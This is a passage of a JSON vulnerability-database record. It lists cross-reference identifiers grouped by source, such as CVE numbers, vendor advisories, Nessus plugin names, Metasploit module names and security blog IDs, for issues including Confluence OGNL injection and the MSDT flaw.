"DD5D2BF7-BE9D-59EA-8DF2-D85AEC13A4A0", "DEAA3BF4-9E7D-55E9-9534-6203A312C46F", "E06577DB-A581-55E1-968E-81430C294A84", "E34732DA-6DCA-54FF-8A7A-C1CCE3D1B1DE", "E51E8D61-BAA6-5098-9EEE-50DD18427F87", "E6B6EDFD-3B78-58CA-B507-093047F89BB1", "E7177DCC-97D5-5A91-8A06-124DD3CB9739", "E917FE93-F06C-5F70-915F-A5F48A30B044", "EA88FA45-8CE7-5D7D-8E6C-B04F8392F7EB", "EF37F62F-1579-535A-9C3E-49B080F41CAC", "F0CF90CD-DC6E-5F0F-AD61-5E1694700F32", "F42BF447-C1A3-5795-8343-D71F096AFF52", "F437A0D1-7913-51F2-9D43-8BC2DE62A636", "F5B504D7-7C37-5BAB-94A5-1F1DA8384055", "F5CEF191-B04C-5FC5-82D1-3B728EC648A9", "F8CD1EFD-78D9-5506-9555-5A12EFB752AB", "F8ECE1BA-CC33-5566-B57C-1AB243A48E28", "F96D1468-D4E5-54F8-A03B-503ABF9BC416", "F9C11A07-BBCF-5A15-82EF-084BD278A556", "FAF36735-05C9-50E1-B458-BA2E15B5EB99", "FB757D3A-A896-5AB5-B72B-7C880581D12E", "FBB2DA29-1A11-5D78-A28C-1BF3821613AC", "FBC7C8E7-D9E9-50AF-A463-1504B4FC5BE9", "FC455648-370A-582B-A03A-6299DDC272F6", "FCCAAA4B-646B-578D-8CE2-5439E7799C32", "FD4859A0-D69F-503C-BFDB-0C9025BDC68F", "FD6B81DE-3BFF-5BC7-BD1F-E90103B8FBEF", "FF761088-559C-5E71-A5CD-196D4E4571B8", "FFA2D3A3-AFD4-580B-8424-EE4844976B65"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:134E75915DAD18CF160898445DC5FC4A", "GOOGLEPROJECTZERO:3A510C521DE8145372456D2B0FE8C8E5", "GOOGLEPROJECTZERO:591D9795B7E42F2AC5B0A7CA7AA82BEB", "GOOGLEPROJECTZERO:A395083F123D276DEBD13E65116FEA09", "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "hackerone", "idList": ["H1:1606957"]}, {"type": "hivepro", "idList": ["HIVEPRO:04FABAE2F2B647B3488AA0025301D637", "HIVEPRO:1BBAC0CD5F3681EC49D06BE85DC90A92", "HIVEPRO:2A4C96F3CDC5144909A1C1EA5E182515", "HIVEPRO:573E7326CF205779BA6C4D3AB8DDB736", "HIVEPRO:6551149EE518F9D073E43B5017FE0F24", "HIVEPRO:846D6C3457AE99FD0B4F29A6398D6F81", "HIVEPRO:9E33ABD5EAFB3204848DAD28367798A9", "HIVEPRO:9ED793E90599B498499D6CB773C9F42F", "HIVEPRO:B3F9F66CBDECF3B8E7AADF5951D97F6A", "HIVEPRO:B772F2F7B4C9AE8452D1197E2E240204", "HIVEPRO:B84508E062BD1F35232DF0CC7CDDC761", "HIVEPRO:C0B03D521C5882F1BE07ECF1550A5F74", "HIVEPRO:C7B595FEDAF36C429CA05AF1C5C3D818", "HIVEPRO:CA37C8D639BE8660B8996BB5FB4F3C0F", "HIVEPRO:E57DA2FED4B890B898EFA2B68C657043", "HIVEPRO:E7F36EC1E4DCF018F94ECD22747B7093", "HIVEPRO:E9C63D0D70D3232F21940B33FC205340", "HIVEPRO:F95B9B5A24C6987E85478A62BD37DD7D"]}, {"type": "ics", "idList": ["AA22-117A", "AA22-216A", "AA22-279A", "AA23-215A", "ICSA-22-209-01"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:0BD55CF3ADC4FC18663ADAF4AE9272D2", "IMPERVABLOG:7CB37AC69862942C5D316E69A7815579", "IMPERVABLOG:85E1B351EDAA80DF81632A8B8BD07634", "IMPERVABLOG:F193BFA34E9266EE9047B9FAB1A3A1B5"]}, {"type": "kaspersky", "idList": ["KLA10846", "KLA12071", "KLA12133", "KLA12134", "KLA12182", "KLA12204", "KLA12205", "KLA12209", "KLA12250", "KLA12259", "KLA12277", "KLA12278", "KLA12422", "KLA12492", "KLA12499", "KLA12513", "KLA12524", "KLA12526", "KLA12529", "KLA12549", "KLA12550"]}, {"type": "kitploit", "idList": ["KITPLOIT:3043339745958474082", "KITPLOIT:3697667464193804316"]}, {"type": "krebs", "idList": ["KREBS:1BEFD58F5124A2E4CA40BD9C1B49B9B7", "KREBS:2752861A306F74170D69FBD9E0DC3AAB", "KREBS:2EC42B845847A6DCFE50ECEB9FF61C29", "KREBS:409088FC2DFC219B74043104C2B672CC", "KREBS:5FA70C019AB463F5E02A97C6891685D8", "KREBS:7BA87FE317071FD5ACDB0EBEBA296F41"]}, {"type": "mageia", "idList": ["MGASA-2016-0274", "MGASA-2022-0075", "MGASA-2022-0118", "MGASA-2022-0146"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:0647495F01C9F1847B118A9E32BC6C13", "MALWAREBYTES:08FDD3DEF41B63F1DEB23C21DCFDB12D", "MALWAREBYTES:0CEEA2EDED4A06AE416CB7875CCE1C94", "MALWAREBYTES:180975C3E3516E431BF7664666327048", "MALWAREBYTES:3203C761121FB47FC676CC2505B4A9FD", "MALWAREBYTES:390E663F11CA04293C83488A40CB3A8A", "MALWAREBYTES:3C358DDA439A247A9677866AFE8FA961", "MALWAREBYTES:4E1B9086679032E60157678F3E82229D", "MALWAREBYTES:69B09CC9DBBA58546698D97B0C4BAAF0", "MALWAREBYTES:6A30A2B661E06D2D7D26479F27BB0EF3", "MALWAREBYTES:6AC81D4001C847401760BE111E21585B", "MALWAREBYTES:762422C08BCD930748F1EED62A25716D", "MALWAREBYTES:76333D1F0FCAFD79FA2EDD4A4CAFBB38", "MALWAREBYTES:7697B62E0C0C7AA37884F3F73C3AF324", "MALWAREBYTES:801E20618F96EF51F9E60F7BC7906C2B", "MALWAREBYTES:8922C922FFDE8B91C7154D8C990B62EF", "MALWAREBYTES:96F58422910DF7040786EDB21736E547", "MALWAREBYTES:9E683A8CBB0F4ADB76A7183C47833E13", "MALWAREBYTES:A92CA3CF06DBCD086A388A462B770E3B", "MALWAREBYTES:B8C767042833344389F6158273089954", "MALWAREBYTES:C265FF6D1D82CDE3FB6E6C1E4248A791", "MALWAREBYTES:CA300551E02DA3FFA4255FBA0359A555", "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "MALWAREBYTES:DB54B348AF1AC41987150B5CE7B1BC66", "MALWAREBYTES:E9F8D9962C90DF0556F1F4180FFAA7D7", "MALWAREBYTES:F1563A57212EB7AEC347075E94FF1605", "MALWAREBYTES:FC8647475CCD473D01B5C0257286E101"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_NAMESPACE_OGNL_INJECTION-", "MSF:EXPLOIT-MULTI-HTTP-ATLASSIAN_CONFLUENCE_WEBWORK_OGNL_INJECTION-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSDTJS_RCE-", "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSHTML_RCE-", "MSF:EXPLOIT-WINDOWS-LOCAL-CVE_2022_21882_WIN32K-"]}, {"type": "mmpc", "idList": ["MMPC:1AFF4881941FA1030862F773DC84A4A8", "MMPC:27EEFD67E5E7E712750B1472E15C5A0B", "MMPC:42ECD98DCF925DC4063DE66F75FB5433", "MMPC:795E0A765679492C51FEFA2B19EAD597"]}, {"type": "mscve", "idList": ["MS:CVE-2021-1698", "MS:CVE-2021-1732", "MS:CVE-2021-21195", "MS:CVE-2021-30551", "MS:CVE-2021-36942", "MS:CVE-2021-40444", "MS:CVE-2022-1096", "MS:CVE-2022-1232", "MS:CVE-2022-1364", "MS:CVE-2022-21882", "MS:CVE-2022-21887", "MS:CVE-2022-26925", "MS:CVE-2022-30190", "MS:CVE-2022-34713"]}, {"type": "mskb", "idList": ["KB5005030", "KB5005031", "KB5005033", "KB5005040", "KB5005043", "KB5005076", "KB5005088", "KB5005089", "KB5005090", "KB5005094", "KB5005095", "KB5005099", "KB5005106", "KB5005563"]}, {"type": "msrc", "idList": ["MSRC:023FEF60BCC2EE0035211FC95DB999BC", "MSRC:0FAFC00A7C2E92F14C0652D2CD1D14D7", "MSRC:4C56F4539ADD1B17DFD44549ADFEE2FF", "MSRC:AA9DD4993698C2F7A48FCF9F2BB413F3"]}, {"type": "mssecure", "idList": ["MSSECURE:1AFF4881941FA1030862F773DC84A4A8", "MSSECURE:27EEFD67E5E7E712750B1472E15C5A0B", "MSSECURE:42ECD98DCF925DC4063DE66F75FB5433", "MSSECURE:795E0A765679492C51FEFA2B19EAD597"]}, {"type": "nessus", "idList": ["802027.PRM", "ALMA_LINUX_ALSA-2022-1777.NASL", "APPLE_IOS_153_CHECK.NBIN", "ATLASSIAN_CONFLUENCE_CONFSERVER-79016.NASL", "CENTOS8_RHSA-2022-1777.NASL", "CONFLUENCE_CONFSERVER-67940.NASL", "CONFLUENCE_CVE-2022-26134_REMOTE.NASL", "CONFLUENCE_CVE_2021_26084.NBIN", "CONFLUENCE_CVE_2022_26134.NBIN", "DEBIAN_DSA-3637.NASL", "DEBIAN_DSA-4886.NASL", "DEBIAN_DSA-5083.NASL", "DEBIAN_DSA-5084.NASL", "DEBIAN_DSA-5110.NASL", "DEBIAN_DSA-5114.NASL", "DEBIAN_DSA-5121.NASL", "FREEBSD_PKG_20B3AB21C9DF11EB85583065EC8FD3EC.NASL", "FREEBSD_PKG_323F900DAC6D11ECA0B83065EC8FD3EC.NASL", "FREEBSD_PKG_6FAE9FE1504811E68AA73065EC8FD3EC.NASL", "FREEBSD_PKG_A25EA27BBCED11EC87B53065EC8FD3EC.NASL", "FREEBSD_PKG_BDDADAA4922711EB99C5E09467587C17.NASL", "FREEBSD_PKG_FE15F30AB4C911EC94A33065EC8FD3EC.NASL", "GENTOO_GLSA-201610-09.NASL", "GENTOO_GLSA-202104-08.NASL", "GENTOO_GLSA-202107-06.NASL", "GENTOO_GLSA-202208-25.NASL", "GENTOO_GLSA-202208-39.NASL", "GOOGLE_CHROME_100_0_4896_127.NASL", "GOOGLE_CHROME_100_0_4896_75.NASL", "GOOGLE_CHROME_52_0_2743_82.NASL", "GOOGLE_CHROME_89_0_4389_114.NASL", "GOOGLE_CHROME_91_0_4472_101.NASL", "GOOGLE_CHROME_99_0_4844_84.NASL", "MACOSX_GOOGLE_CHROME_100_0_4896_127.NASL", "MACOSX_GOOGLE_CHROME_100_0_4896_75.NASL", "MACOSX_GOOGLE_CHROME_52_0_2743_82.NASL", "MACOSX_GOOGLE_CHROME_89_0_4389_114.NASL", "MACOSX_GOOGLE_CHROME_91_0_4472_101.NASL", "MACOSX_GOOGLE_CHROME_99_0_4844_84.NASL", "MACOS_HT213054.NASL", "MACOS_HT213055.NASL", "MACOS_HT213092.NASL", "MICROSOFT_EDGE_CHROMIUM_100_0_1185_36.NASL", "MICROSOFT_EDGE_CHROMIUM_100_0_1185_44.NASL", "MICROSOFT_EDGE_CHROMIUM_89_0_774_68.NASL", "MICROSOFT_EDGE_CHROMIUM_91_0_864_48.NASL", "MICROSOFT_EDGE_CHROMIUM_99_0_1150_55.NASL", "MSDT_RCE_CVE_2022-30190_REG_CHECK.NASL", "OPENSUSE-2016-900.NASL", "OPENSUSE-2016-901.NASL", "OPENSUSE-2016-919.NASL", "OPENSUSE-2021-513.NASL", "OPENSUSE-2021-592.NASL", "OPENSUSE-2021-881.NASL", "OPENSUSE-2021-938.NASL", "OPENSUSE-2021-949.NASL", "OPENSUSE-2022-0114-1.NASL", "OPENSUSE-2022-0705-1.NASL", "ORACLELINUX_ELSA-2022-1777.NASL", "REDHAT-RHSA-2016-1485.NASL", "REDHAT-RHSA-2022-1777.NASL", "SMB_NT_MS21_AUG_5005030.NASL", "SMB_NT_MS21_AUG_5005043.NASL", "SMB_NT_MS21_AUG_5005089.NASL", "SMB_NT_MS21_AUG_5005094.NASL", "SMB_NT_MS21_AUG_5005095.NASL", "SMB_NT_MS21_AUG_5005106.NASL", "SMB_NT_MS21_FEB_4601315.NASL", "SMB_NT_MS21_FEB_4601319.NASL", "SMB_NT_MS21_FEB_4601345.NASL", "SMB_NT_MS21_FEB_4601354.NASL", "SMB_NT_MS21_IE_SEPT_2021.NASL", "SMB_NT_MS21_SEP_5005565.NASL", "SMB_NT_MS21_SEP_5005566.NASL", "SMB_NT_MS21_SEP_5005568.NASL", "SMB_NT_MS21_SEP_5005569.NASL", "SMB_NT_MS21_SEP_5005573.NASL", "SMB_NT_MS21_SEP_5005613.NASL", "SMB_NT_MS21_SEP_INTERNET_EXPLORER.NASL", "SMB_NT_MS22_JAN_5009543.NASL", "SMB_NT_MS22_JAN_5009545.NASL", "SMB_NT_MS22_JAN_5009555.NASL", "SMB_NT_MS22_JAN_5009557.NASL", "SMB_NT_MS22_JAN_5009566.NASL", "SMB_NT_MS22_JUN_5014678.NASL", "SMB_NT_MS22_JUN_5014692.NASL", "SMB_NT_MS22_JUN_5014697.NASL", "SMB_NT_MS22_JUN_5014699.NASL", "SMB_NT_MS22_JUN_5014702.NASL", "SMB_NT_MS22_JUN_5014710.NASL", "SMB_NT_MS22_JUN_5014741.NASL", "SMB_NT_MS22_JUN_5014742.NASL", "SMB_NT_MS22_JUN_5014743.NASL", "SMB_NT_MS22_JUN_5014746.NASL", "SMB_NT_MS22_MAY_5013941.NASL", "SMB_NT_MS22_MAY_5013942.NASL", "SMB_NT_MS22_MAY_5013943.NASL", "SMB_NT_MS22_MAY_5013944.NASL", "SMB_NT_MS22_MAY_5013945.NASL", "SMB_NT_MS22_MAY_5013952.NASL", "SMB_NT_MS22_MAY_5013963.NASL", "SMB_NT_MS22_MAY_5013999.NASL", "SMB_NT_MS22_MAY_5014001.NASL", "SMB_NT_MS22_MAY_5014006.NASL", "SMB_NT_MS22_MAY_5014018.NASL", "SUSE_SU-2022-0703-1.NASL", "SUSE_SU-2022-0705-1.NASL", "SUSE_SU-2022-0811-1.NASL", "UBUNTU_USN-3041-1.NASL", "UBUNTU_USN-5350-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310703637", "OPENVAS:1361412562310808263", "OPENVAS:1361412562310808264", "OPENVAS:1361412562310808265", "OPENVAS:1361412562310842848", "OPENVAS:1361412562310851369", "OPENVAS:1361412562310851370", "OPENVAS:1361412562310851374", "OPENVAS:703637"]}, {"type": "oraclelinux", "idList": ["ELSA-2022-1777"]}, {"type": "osv", "idList": ["OSV:DSA-3637-1", "OSV:DSA-4886-1", "OSV:DSA-5083-1", "OSV:DSA-5084-1", "OSV:DSA-5110-1", "OSV:DSA-5114-1", "OSV:DSA-5121-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161880", "PACKETSTORM:164013", "PACKETSTORM:164122", "PACKETSTORM:165214", "PACKETSTORM:166169", "PACKETSTORM:167317", "PACKETSTORM:167430", "PACKETSTORM:167438", "PACKETSTORM:167449", "PACKETSTORM:167516"]}, {"type": "pentestpartners", "idList": ["PENTESTPARTNERS:E6B48FF79C5D0D1E4DD360F6010F2A93"]}, {"type": "photon", "idList": ["PHSA-2023-3.0-0602"]}, {"type": "qt", "idList": ["QT:B64AD93E56170FC29816162A7B78DDBC"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:027905A1E6C979D272DF11DDA2FC9F8F", "QUALYSBLOG:058E013CF475F33D6DEBB8955340D15B", "QUALYSBLOG:0F0ACCA731E84F3B1067935E483FC950", "QUALYSBLOG:5576D16DC39617927D8AEFF027CC0911", "QUALYSBLOG:573ABD5196CDA14A2E72A15A7330770D", "QUALYSBLOG:5CC7ADA9A785C30C51281080605F4A4F", "QUALYSBLOG:65C282BB0F312A3AD8A043024FD3D866", "QUALYSBLOG:7BB591052411447A2B315456D50D258C", "QUALYSBLOG:9E3CACCA2916D132C2D630A8C15119F3", "QUALYSBLOG:A0F20902D80081B44813D92C6DCCDAAF", "QUALYSBLOG:A63B251EBA1A69DBCD57674990704F6C", "QUALYSBLOG:AC756D2C7DB65BB8BC9FBD558B7F3AD3", "QUALYSBLOG:AD927BF1D1CDE26A3D54D9452C330BB3", "QUALYSBLOG:BB3D6B2DDD8D4FA41B52503EF011FDA4", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "QUALYSBLOG:D38E3F9D341C222CBFEA0B99AD50C439", "QUALYSBLOG:EB91FABB1A5D9C2526980E996ED61260", "QUALYSBLOG:EBDC158D70A96D1C65D2AEE5C285A069", "QUALYSBLOG:F9C2629D40A6DC7640DB3D6BD4FB60B3"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:03B1EB65D8A7CFE486943E2472225BA1", "RAPID7BLOG:20364300767E58631FFE0D21622E63A3", "RAPID7BLOG:266ADCD22F7AAC05069D569EBF2FEBB9", "RAPID7BLOG:3538F350FD08E0CFD124821C57A21C64", "RAPID7BLOG:36C78C12B88BFE8FEF93D8EF7A7AA553", "RAPID7BLOG:396ACAA896DDC62391C1F6CBEDA04085", "RAPID7BLOG:44EA89871AFF6881B909B9FD0E07034F", "RAPID7BLOG:452CCDC1AEFFF7056148871E86A6FE26", "RAPID7BLOG:4BFD931715758C7B7E2711A580BFEA5E", "RAPID7BLOG:509F3BE1FB927288AB4D3BD9A3090852", "RAPID7BLOG:5CDF95FB2AC31414FD390E0E0A47E057", "RAPID7BLOG:619370773CDB77FA0DBA52EC74E4B159", "RAPID7BLOG:693317EA8EAC89A3ABCC113D072B326C", "RAPID7BLOG:6F833E0DB9E152EB8397D33430FECB7F", "RAPID7BLOG:755102CA788DC2D430C6890A3E9B1040", "RAPID7BLOG:82692E307F294B32BDCAC4053EBE23B2", "RAPID7BLOG:882168BD332366CE296FB09DC00E018E", "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "RAPID7BLOG:9171BB636F16B6AC97B939C701ABE971", "RAPID7BLOG:A7E1C05842DF5C07D9B1BA23B2235727", "RAPID7BLOG:A94573CD34833AE3602C45D8FAA89AD4", "RAPID7BLOG:ADAE3CACA7F41A02C12F44F4616369FF", "RAPID7BLOG:AE824D3989C792700A622C455D8EE160", "RAPID7BLOG:AF9402873FB7ED43C52806FDEB7BC6DD", "RAPID7BLOG:B294A0F514563C5FBF86F841910C60BE", "RAPID7BLOG:C45DEEA0736048FF17FF9A53E337C92D", "RAPID7BLOG:CC071AA6971D64B0F7A596B2BBD5F046", "RAPID7BLOG:D214650E6EFB584624DA76ACB1573C1B", "RAPID7BLOG:D435EE51E7D9443C43ADC937A046683C", "RAPID7BLOG:D9E3C0B84D67BD0A26DEAD5F6F4EAAC4", "RAPID7BLOG:DE426F8A59CA497BB6C0B90C0F1849CD"]}, {"type": "redhat", "idList": ["RHSA-2016:1485", "RHSA-2022:1777"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-5128", "RH:CVE-2022-1364", "RH:CVE-2022-22620"]}, {"type": "rocky", "idList": ["RLSA-2022:1777"]}, {"type": "schneier", "idList": ["SCHNEIER:FECDA04283F9CFE2D14C1550420A1804"]}, {"type": "securelist", "idList": ["SECURELIST:0ED76DA480D73D593C82769757DFD87A", "SECURELIST:11665FFD7075FB9D59316195101DE894", "SECURELIST:1F59148E6615695438F94EF4956585AA", "SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:29152837444B2A7E5A9B9FCB107DAB36", "SECURELIST:5147443B0EBD7DFCCB942AD0E2F92CCF", "SECURELIST:63306FA6D056BD9A04969409AC790D84", "SECURELIST:86368EF0EA7DAA3D2AB20E0597A62656", "SECURELIST:934E8AA177A27150B87EC15F920BF350", "SECURELIST:A10F281EF99381636376D6F6C6501E22", "SECURELIST:A3D3514100806269750A23D748D34C59", "SECURELIST:BB0230F9CE86B3F1994060AA0A809C08", "SECURELIST:C1F2E1B6711C8D84F3E78D203B3CE837", "SECURELIST:C540EBB7FD8B7FB9E54E119E88DB5C48", "SECURELIST:D9AF9603FDB076FD6351B6ED483A4947"]}, {"type": "seebug", "idList": ["SSV:99168"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2016:1865-1", "OPENSUSE-SU-2016:1868-1", "OPENSUSE-SU-2016:1869-1", "OPENSUSE-SU-2016:1918-1", "OPENSUSE-SU-2021:0513-1", "OPENSUSE-SU-2021:0515-1", "OPENSUSE-SU-2021:0592-1", "OPENSUSE-SU-2021:0881-1", "OPENSUSE-SU-2021:0938-1", "OPENSUSE-SU-2021:0948-1", "OPENSUSE-SU-2021:0949-1", "OPENSUSE-SU-2022:0091-1", "OPENSUSE-SU-2022:0103-1", "OPENSUSE-SU-2022:0110-1", "OPENSUSE-SU-2022:0112-1", "OPENSUSE-SU-2022:0114-1", "OPENSUSE-SU-2022:0123-1", "OPENSUSE-SU-2022:0156-1", "OPENSUSE-SU-2022:0705-1"]}, {"type": "talosblog", "idList": ["TALOSBLOG:446DF38AD4792F3CF775EEF8182E9A9B", "TALOSBLOG:DE5281D9A4A03E4FA1F2A0B62B527489"]}, {"type": "thn", "idList": ["THN:012EBB2FE2687F178FBCC3AB8ABEF778", "THN:0488E447E08622B0366A0332F848212D", "THN:080602C4CECD29DACCA496697978CAD0", "THN:0ADE883013E260B4548F6E16D65487D3", "THN:0C87C22B19E7073574F7BA69985A07BF", "THN:1A836FDDE57334BC4DAFA65E6DFA02E4", "THN:1B5512B7CB75F82A34395AC39A9B2680", "THN:1B983787EB2BA5D0757F1F83458B7ABE", "THN:1E1F3CC9BEE728A9F18B223FC131E9B1", "THN:1EFEC00D867275514EA180819C9EF104", "THN:1F783FB04C34EEEF700F6B7C43ED8FA3", "THN:21FC29F7D7C7E2DA7D2F19E89085FD55", "THN:222F7713CA968509F8C385BA29B0B6A5", "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "THN:273B5BCEB3A6EC52EA8B8BB5D09A21BF", "THN:2E90A09BA23747C57B4B5C9ED7D13ED9", "THN:2FB8A3C1E526D1FFA1477D35F0F70BF4", "THN:35E0781FC3AEDCA2324C9B95396A5FF7", "THN:362401076AC227D49D729838DBDC2052", "THN:3B20D0D7B85F37BBDF8986CC9555A7A4", "THN:4376782A3F009FEED68FDD2022A11EF5", "THN:44DD118DC206D25EB4ECAE95173FE16E", "THN:4B97BCD00CAE89549A57EBFAECA484AE", "THN:4CC79A3CEFEDEB0DC9CF87C5B9035209", "THN:4DE731C9D113C3993C96A773C079023F", "THN:4E80D9371FAC9B29044F9D8F732A3AD5", "THN:50D7C51FE6D69FC5DB5B37402AD0E412", "THN:573D61ED9CCFF01AECC281F8913E42F8", "THN:5763EE4C0049A18C83419B000AAB347A", "THN:59AE75C78D4644BFA6AD90225B3DE0C1", "THN:62ECC5B73032124D6559355B66E1C469", "THN:67ECC712AB360F5A56F2434CDBF6B51F", "THN:6A9CD6F085628D08978727C0FF597535", "THN:6C7E32993558CB9F19CAE15C18522582", "THN:6F5BF10AC5A30E497851C9ADE15C774A", "THN:75586AE52D0AAF674F942498C96A2F6A", "THN:75A32CF309184E2A99DA7B43EFBFA8E7", "THN:7A6D54BC76D090840197DDF871D59731", "THN:7D7C05739ECD847B8CDEEAF930C51BF8", "THN:81C9EF28EEDF49E21E8DF15A8FF7EB8D", "THN:856F9A41F44F9B2C95A68501B0D1B5A7", "THN:8A60310AB796B7372A105B7C8811306B", "THN:8C7C0BBCE90D4B2076F46E011BAB609D", "THN:959FD46A8D71CA9DDAEDD6516113CE3E", "THN:96E4C6D641E3E5B73D4B9A87628DD3CF", "THN:9A9EADE3A5D4449C9E0519E22A93B306", "THN:A19D66C10E6D6239DFCE7CD41A974F09", "THN:A24E3ECC17FDA35932981ED1D0B9B351", "THN:A60A19BF44B2CA75E63F31234992BE54", "THN:B399D1943153CEEF405B85D4310C2142", "THN:B7217784F9D53002315C9C43CCC73766", "THN:B7C3E2FB36F3AC7424BD3AE9F877CF3C", "THN:B8CBCDA7152660D9AE3D4E058B7B9B0F", "THN:BBBFDA7EEE18F813A5DA572FD390D528", "THN:BD014635C5F702379060A20290985162", "THN:BD5ADDFE4C645A1619B0A94487CE63DF", "THN:C17A0F3DD156CF2240FAEABA6716D0E9", "THN:C19BDA30D2242223E7A434F1E4051E68", "THN:C4188C7A44467E425407D33067C14094", "THN:C736174C6B0ADC38AA88BC58F30271DA", "THN:CD69EF060C75E2FF4DB33C7C492E75B1", "THN:CDCF433A7837180E1F294791C672C5BB", "THN:CDFC216AC6B26D35C38BDB32822B4E96", "THN:D4E86BD8938D3B2E15104CA4922A51F8", "THN:D9A5562FBD56B3B0FF85376C9BCF0A10", "THN:DCB20559AE0C35EB864725D482E268C2", "THN:DEAEC76D89D5583101E2E6036C289609", "THN:DFB68B1B6C2EFBB410EB54D83320B71C", "THN:E0B486DA1C8CE77D0DF337E8307100D6", "THN:E48AEFF468AB8445D91A32B6F5D7A770", "THN:E7762183A6F7B3DDB942D3F1F99748F6", "THN:EAFAEB28A545DC638924DAC8AAA4FBF2", "THN:EC350D7E2CF02EC9CB76AA85E0D3F47A", "THN:EC6517AAC0BD5D8BBC4C4D32420CA903", "THN:EDC4E93542AFAF751E67BF527C826DA4", "THN:F0450E1253FFE5CA527F039D3B3A72BD", "THN:F076354512CA34C263F222F3D62FCB1E", "THN:F163C7AB35BEF8E28924E14B02752181", "THN:F601EBBE359B3547B8E79F0217562FEF", "THN:FB2F303221B7A65E2CFAC245F0DD0B47", "THN:FD9FEFEA9EB66115FF4BAECDD8C520CB", "THN:FF1CD6F91A87ADD45550F34DE9C8204A", "THN:FFFF05ECDE44C9ED26B53D328B60689B"]}, {"type": "threatpost", "idList": ["THREATPOST:042D7C606FEB056B462B0BFB61E59917", "THREATPOST:1502920D4F50B0D128077B515815C023", "THREATPOST:22B3A2B9FF46B2AE65C74DA2E505A47E", "THREATPOST:24243FD4F7B9BDBDAC283E15D460128F", "THREATPOST:3697F9293A6DFF6CD5927E9E68FF488A", "THREATPOST:3C3F20C93519036CC712D1CA3A6D7C48", "THREATPOST:4365205CB12A4437E20A1077682B9CF8", "THREATPOST:44942C746E9FFDC2F783FA19F0AFD348", "THREATPOST:45B63C766965F5748AEC30DE709C8003", "THREATPOST:4C8D995307A845304CF691725B2352A2", "THREATPOST:4EEFA1A0FABB9A6E17C3E70F39EB58FE", "THREATPOST:57E503E30D6F729869ADA40579BF5339", "THREATPOST:6067B6D35C99BFCFF226177541A31F69", "THREATPOST:62DC935BF4DB4EF8A4F1E83519B1D5CD", "THREATPOST:65CDAAFAA856DA03BD3115E8BC92F1A0", "THREATPOST:6D61C560E85ECD0A7A35C55E74849510", "THREATPOST:705B9DD7E8602B9F2F913955E25C2550", "THREATPOST:8594A8F12FC5C97E7E62AF7B9BE3F1AA", "THREATPOST:88DD5812D3C8652E304F32507E4F68DD", "THREATPOST:8C179A769DB315AF46676A862FC3D942", "THREATPOST:8D4EA8B0593FD44763915E703BC9AB72", "THREATPOST:91A97EE2BD6933FEB9A07162BD4ED8B5", "THREATPOST:9673D04DAD513AC05EA6440633D75339", "THREATPOST:A8A7A761CD72E2732BD9E3C75C4A2ACC", "THREATPOST:A98C64CB9BDDE55F51C984B749753904", "THREATPOST:B2FEDF3EA50507F526C77105093E8977", "THREATPOST:B7A9B20B1E9413BB675D8C2810F1365F", "THREATPOST:B8BEEE8F3BDF1B6AD88639DA8C4595EA", "THREATPOST:C2E1563DBC065025E810CF457E1A802B", "THREATPOST:CF93F3E6D1E96AACFAEE9602C90A711D", "THREATPOST:DE317ED7C5E4858FE861A15F96F6BCFD", "THREATPOST:EA23582BD77C428ACE9B9DB7D5741EB6", "THREATPOST:FFC3DB875D4337781CF78C0D4B39F0E0"]}, {"type": "trellix", "idList": ["TRELLIX:0BACBA94111E0C364A9A1CCD8BD263DE", "TRELLIX:1B98406D173663FA7B8E48F103AAE482", "TRELLIX:341471F990B5DC7BFF1C28F924F10E32", "TRELLIX:4EE3028711C16E3513FC2CF300440452", "TRELLIX:6949BCDE9887B6759BD81365E21DD71C", "TRELLIX:73420774AE3767CFB11F493B41572174", "TRELLIX:8CB786600FA7F187E3D16B1E340639C2", "TRELLIX:C68274BBC4E0B3B7EFA9290A8C6AA6C2", "TRELLIX:D8DB23FAEBC16DCFBC54050BEBBF650D", "TRELLIX:ED6978182DFD9CD1EA1E539B1EDABE6C"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:1333714193E63A3E616DE66054C5D640", "TRENDMICROBLOG:608F794950B54766A75ABA93823701D0", "TRENDMICROBLOG:B2CE0B51EC84664ADCCD67A2A0DF7033", "TRENDMICROBLOG:B5EA1F5E613C3A15D832147CF064EC78", "TRENDMICROBLOG:C00F7F935E0D1EAD0509B4C376B20A1F", "TRENDMICROBLOG:C9F6DD38959C2193331C83CA846C0A71", "TRENDMICROBLOG:E0C479F55DF4C53A47CA2170110555AE", "TRENDMICROBLOG:E17B66F8728189778826A0F497A540F2"]}, {"type": "ubuntu", "idList": ["USN-3041-1", "USN-5350-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-5128", "UB:CVE-2021-21195", "UB:CVE-2021-30551", "UB:CVE-2022-1096", "UB:CVE-2022-1232", "UB:CVE-2022-1364", "UB:CVE-2022-22620", "UB:CVE-2022-26134"]}, {"type": "veracode", "idList": ["VERACODE:29914", "VERACODE:30949", "VERACODE:34313", "VERACODE:34866", "VERACODE:35080", "VERACODE:35135"]}, {"type": "wallarmlab", "idList": ["WALLARMLAB:C5940EBF622709A929825B8B12592EF5", "WALLARMLAB:E69ED97E0B27F68EA2CE3BB7BA9FE681"]}, {"type": "zdt", "idList": ["1337DAY-ID-36694", "1337DAY-ID-36730", "1337DAY-ID-37126", 